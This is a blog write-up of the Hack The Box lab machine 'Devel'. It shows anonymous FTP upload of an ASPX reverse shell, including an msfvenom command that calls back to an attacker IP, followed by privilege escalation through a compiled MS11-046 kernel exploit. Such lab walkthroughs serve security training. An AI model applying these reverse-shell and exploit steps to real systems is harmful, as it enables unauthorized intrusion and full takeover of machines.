Hack The Box — Devel

Devel is an Easy level Windows machine on Hack The Box.

ENUMERATION

An nmap scan shows us that FTP and HTTP are open and target is running a windows operating system.Moreover FTP has anonymous login allowed.

We connect to ftp and try downloading all files using mget command however we don’t find anything interesting within it.

However if we try uploading any file to the ftp server, we are able to do it.(not shown in the screenshot above) To do so, simply try making a file called test.txt in you kali and in the FTP which we are connected to , run the command— put test.txt and your file will be uploaded.You can check it by running the ls command.

So Since we can upload a file, lets upload a malicious one, For this pirticular target, we will be uploading an ASPX shell reason being that our target is running IIS which is a windows server(refer Nmap results) and whenever we have IIS, we go with an aspx shell.

In order to create an aspx shell, you can either use msfvenom or download an aspx shell from github.

MSFVENOM COMMAND TO GENERATE AN ASPX REVERSE SHELL

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.37.87 LPORT=7777 -f aspx -o shell.aspx

(DO NOTE that msfvenom makes a 32 bit reverse shell by default which works on both 32 bit and 64 bit architectured target)

ASPX REVERSE SHELL DOWNLOAD

You can also try downloading a aspx reverse shell from github which i did.This is really good — https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx

Once you have downloaded it, make sure to change the ip and port in the script.Now simply upload the reverse shell in ftp using- put revshell.aspx

EXPLOITATION

Now all you have to do is start a netcat listener and go to the webpage and access the reverse shell which will execute it.

And we have a shell. . .

PRIVILEGE ESCALATION

For privilege escalation, i will cover 2 mannual ways, however you can check out the way using metasploit as well.

We run whoami /priv to check what privileges are enabled on the target and also systeminfo command to see details about our target machine.

We see that we have some privileges enabled, Our target is running windows 7 and we can even see the BUILD of our target which is 6.1.7600 N/A Build 7600 moreover we can see that the name of the os is DEVEL and if you read the results of the systeminfo command carefully(not shown in the above screenshot) you will find something called “HOTFIX” on the left side which is set to N/A meaning that our target hasn’t been patched.

We can also try to run a script such as WINPEAS to enumerate varous privilege escalation vectors on our target.You can download the .bat extension of winpeas here as the .exe one doesnt seem to work well on the target

Download Link-https://github.com/carlospolop/PEASS-ng/blob/master/winPEAS/winPEASbat/winPEAS.bat

To transfer files,Simply start a python httpserver in your kali to host files

and download it in windows using Certutil( I tried using powershell-invoke and wget however it didn’t seem to work) And finally run winpeas

I tried to have a look at the results however the script kept running and didn’t stop.moreover nothing was highlighted either.Still it is a good practice to enumerate our target as much as we can…maybe even try running a Windows Exploit Suggester.

1) USING KERNEL EXPLOIT (MS11–046)

Since we know the build of our target os after running the systeminfo command, we can simply google the build and it will instant lead us to a kernel exploit(MS11–046)

Results from sysyteminfo command
Google search of the BUILD version

If you look at the links above, you can find the exploit in .c extension which means that it is written in C and we have to compile it into an exe file.However if you take a look at the second url by abatachy17, you can find a pre compiled exploit of (MS11–046) on his github repo--https://github.com/abatchy17/WindowsExploits/blob/master/MS11-046/MS11-046.exe

Now simply transfer the exploit to the target machine using certutil

IF YOU WANT TO COMPILE THE C EXPLOIT

However if you want to compile the C exploit, just go to exploit-db and read about (MS11–046) and you will find instructions on how to compile the exploit.

WE NEED TO COMPILE THE EXPLOIT USING — mingw32 (i have actually heard about this compiler for the first time) Anyways a google search shows us how to install it

COMMAND TO INSTALL-

apt-get updateapt-get install mingw-w64

Once mingw32 is installed, simply use it to compile the C exploit into exe as per the instruction given in the description of exploit code(in the 2nd above image)

COMMAND TO COMPILE-

i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32

NOW ALL WE HAVE TO DO IS RUN THE EXPLOIT AND WE GAIN A SYSTEM SHELL !!!

we are system!!!

2) USING JUICY POTATO EXPLOIT

We can also run the Juicy Potato Exploit.After running the whoami /priv command, We immediately see that SeImpersonatePrivilege is enabled.And thus we can use the use juicy exploit.This exploit is Used when the Windows target is less than Windows 10 1809 or less than Windows Server 2019 and for it to work, SeAssignPrimaryTokenPrivilege or SeImpersonatePrivilege must be ENABLED. In our case our target is running windows 7 and SeImpersonatePrivilege is enabled so we can use it !!! However i will not cover it in this writeup.You can check out one of my previous writeups of TryHackMe where it has been used-https://sparshjazz.medium.com/tryhackme-retro-866de1e4242a?postPublishedType=repub

CONCLUSION

In this machine we learned that

  • if FTP allows file upload, we can upload a malicious reverse shell to gain initial access.
  • In case of an IIS server running, we use can use an aspx reverse shell
  • We can google the build of the target OS an try searching for kernel exploits for that particular build.
  • We can use juicy potato exploit if the target windows machine is less than Windows 10 1809 or less than Windows Server 2019 and for it to work, SeAssignPrimaryTokenPrivilege or SeImpersonatePrivilege must be ENABLED.

For more such writeups, make sure you follow me here on Medium. Until next time- ZEUS

--

--

--

I am a Penetration Tester, Currently pursuing OSCP. Skilled in Network Pen-testing and Developing Hacking Tools using Python.I Share my Knowledge on YouTube

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

A Brief Open Letter in Reply to Jonathan Poletti’s Sunday story(?)

Thank you very much!

Christmas during Corona

WEBULL INVESTING! Open a brokerage account and receive 5 FREE stocks valued from $8-$8000!

3 Things That Will Still Be Here in 200 Years

78/365 — Pear

What to do in Japan When You Miss Your Stop

Is The Lockheed SR 72 Son Of The Blackbird Already Flying?

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
ZeusCybersec

ZeusCybersec

I am a Penetration Tester, Currently pursuing OSCP. Skilled in Network Pen-testing and Developing Hacking Tools using Python.I Share my Knowledge on YouTube

More from Medium

Hack The Box — Bastion

HacktheBox [Toolbox]

My First CTF (PicoCTF) — Obedient Cat!

Hackthebox — Devzat Walkthrough